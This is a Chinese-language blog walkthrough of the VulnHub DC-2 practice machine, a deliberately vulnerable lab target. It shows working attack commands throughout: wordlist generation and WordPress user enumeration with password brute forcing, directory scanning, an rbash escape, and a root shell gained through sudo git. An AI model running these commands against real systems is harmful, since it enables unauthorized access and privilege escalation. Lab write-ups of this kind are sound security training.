vulnhub靶机渗透测试DC-2靶机渗透

攻击机-kali-IP:192.168.56.102

靶机-dc2-ip:192.168.103

关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。

查找dc-2 的IP

arp-scan-l

45af4c11a1064e508145a880b848e8c4.png

得到ip为192.168.56.103

扫描开启的端口

nmap -sV -p- 192.168.56.103

455d9a37c2464bfcb5dff023bd93a98e.png

此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22)

因为开启了80端口,此时我们可以去访问它的web服务

此时发现连接不上靶机的web服务,此时可以在hosts文件添加对应的ip和域名解决此问题。kali的hosts文件在etc目录下

3818896081c34eaab2b88b47c9080af7.png

 添加完成之后再继续进行访问,此时可以访问成功

17a34f177f954d6599d499c119003f38.png

并成功看到flag1,此时我们知道cms是wordpress,且提示说需要使用cewl生成密码,关于cewl可自行百度了解一下,它其实就是个ruby应用,爬行指定url的制定深度,简单的说就是针对网站的一些单词或者数字进行爬取

生成密码命令:

cewl -w dc2_password.txt http://dc-2

b09ed6152c324e8386deb9991ca4c413.png

efb3b52e807c41d195dc6a09778cce7d.png

得到密码之后,就还需要用户名,因为是wordpress,使用wpscan工具进行扫描用户,

命令:

wpscan --url http://dc-2 -e u

这个命令不行的话就用这个:

wpscan --ignore-main-redirect --url 192.168.56.103 --enumerate u --force

此时我们就发现问题了,wpscan工具不能正常使用,估计第一次用,没解决过的都会出现这样的问题

47821ce9be8145e89f40fb0fb7f42a89.png

 网上搜索解决办法,这里提供两种解决这个问题办法的链接

kali wpscan 使用及更新报错问题 --api-token获取方法_YouthBelief的博客-CSDN博客_wpscan 更新



更新wpscan_解决新版wpscan无法更新数据库问题_策策的荣耀百科的博客-CSDN博客
 

这两种方法我都试过了,在我这都不行,可能是机子的问题,于是我选择重新下载,由于我的kali连接不是github,至今也没解决访问不了github的问题,于是我在本机下载好拖进kali,发现拖不进去,直接裂开,最后根据前面的方法自己尝试了用下载得到的wpscan文件夹中的updater.rb文件替换kali中的updater.rb这个文件,然后成功就成功解决了此问题,接着开始进行原先的扫描用户的操作

bfad4243fc7c4bf0a66bd403772b97dc.png

b98633c50797413990967746e3a3d1e1.png

得到三个用户:tom、admin、jerry。将三个用户写进user.txt中。

21a2cd6ce42d43adb211dbbaf0ce1d18.png

接着将用户名和密码进行爆破匹配

命令

wpscan --url http://dc-2/ -U user.txt -P dc2_password.txt

ca23ac0483b04bbfaa03305d23edf9b4.png

828aa060003a40b0b47363ec39d3ba36.png(得到的信息过长,一次截图不完全,放两张!)可以看到出来两组正确的用户名和密码。用户名和密码都有了,接着开始寻找登录框,尝试对网站进行挖目录。

命令

dirb http://dc-2

或者使用nikto来探测网站有哪些路径

nikto -host 192.168.56.103

4ae34efafc634df3bbd6c0f5628dd791.png

仔细观察,发现有个admin.php,怀疑它应该是个登录框页面,试试看

145449fb1b5248ab80e6da795006407b.png

成功得到登录框,进行登录

a5d252838a4f48729e4a7522233bd63a.png

这里登录的时候要注意一下,登录之后一直是空白页面此时需手动把url中的admin.php删除掉,变成http://dc-2/wp-admin/ 就能成功显示登录后的页面了

 1d81d5711287490f973e5882463d0914.png

 仔细找找,看到flag2

dfddfc9d9d8a4a639faa19191ab74fd2.png

54741f79b4604a2590dee86f95b3be75.png

得到提示说找不到其他东西了,此时我们知道ssh的默认端口被修改了的,我们可以使用ssh命令指定端口来进行登录

ssh jerry@192.168.56.103 -p 7744

a9651f11faa54edbbfef74ff2d68d27c.png

 发现这个用户不能正常登录,换成tom用户进行登录

cc890033d7fd40b49be75a23db913704.png

登录成功,ls命令查看存在flag3.txt文件,尝试打开

5792ef0e068c46aaa6dc1eb9b1d80f66.png

 提示说没有这个指令,有个-rbash的限制,我们可以通过导出一个环境变量来绕过rbash的限制

BASH_CMDS[a]=/bin/sh;a
/bin/bash

这里是先输入第一个命令,再输入第二个。

接着添加环境变量

export PATH=$PATH:/bin/

之后就可以正常使用cat命令了

74dfc5d202ee4659b3ef030bf82cc254.png

 打开flag3.txt之后得到提示,需切换到jerry用户

300381acce614897a5dc6d67f7e988bb.png

切换了之后,此时注意观察还是处在tom目录下,再换到jerry目录查看文件就发现flag4.txt,尝试打开,提示说还不是最终的flag,还说了git是root不用密码可以运行的,进行git提权,

命令

sudo -l
sudo git -p help
!/bin/bash

69fe4620757e413281399c13ac390c65.png

81919f5cb7a34241a14670d3fbe5caf5.png提权成功!进入root目录,查找文件,发现最后的flag,打开

346ebe8ffb1b44b5bdf8b2a288aaf2e2.png

至此,dc-2靶机结束。

参考链接:靶机渗透测试实战(二)——DC-2_weixin_45116657的博客-CSDN博客

DC-2靶场实战详解_a310034188的博客-CSDN博客_dc靶场


版权声明:本文为m0_62008601原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。